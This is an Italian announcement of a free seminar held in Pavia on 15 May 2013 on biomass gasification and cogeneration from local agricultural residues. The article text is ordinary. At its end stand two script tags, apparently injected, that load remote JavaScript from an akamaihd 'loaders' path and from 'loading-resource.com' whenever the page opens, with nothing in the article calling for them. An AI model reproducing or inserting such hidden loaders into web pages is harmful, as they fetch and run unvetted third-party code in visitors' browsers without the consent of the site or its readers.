EnergEtica in collaborazione con il DAEL (Distretto Agro Energetico Lombardo) organizza mercoledì 15 maggio un seminario gratuito sulla valorizzazione energetica di biomasse tipiche del territorio pavese come la short e medium rotation forestry,la pioppicoltura, gli scarti di potature di vigneti, le paglie di riso, analizzando anche le modalità organizzative delle filiere.
La gassificazione è una delle tecnologie più interessanti per la cogenerazione da biomasse, perché offre una produzione elettrica economicamente sostenibile per impianti di piccola taglia di filiera corta. Inoltre, a differenza delle centrali a combustione, non presenta problematiche di polveri sottili.
Pur trattandosi di una tecnologia che finalmente sta raggiungendo una maturità di livello commerciale, è altresí importante che le caratteristiche dell'impianto siano tarate per una biomassa di alimentazione qualitativamente certa e costante.
A tale scopo, il Club della Gassificazione ha promosso la definizione della Raccomandazione CTI 13 sulla pirogassificazione di biomasse legnose, uno strumento per mettere a confronto caratteristiche e prestazioni di diverse soluzioni tecnologiche.
L’appuntamento è per mercoledì 15 maggio 2013 a Pavia, presso STER Regione Lombardia, via C. Battisti, 150.
L’ingresso al seminario è gratuito, ma è gradita la pre iscrizione sul sito www.agroenergia.eu, da cui sarà possibile trovare anche tutte le presentazioni del seminario previa registrazione.
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>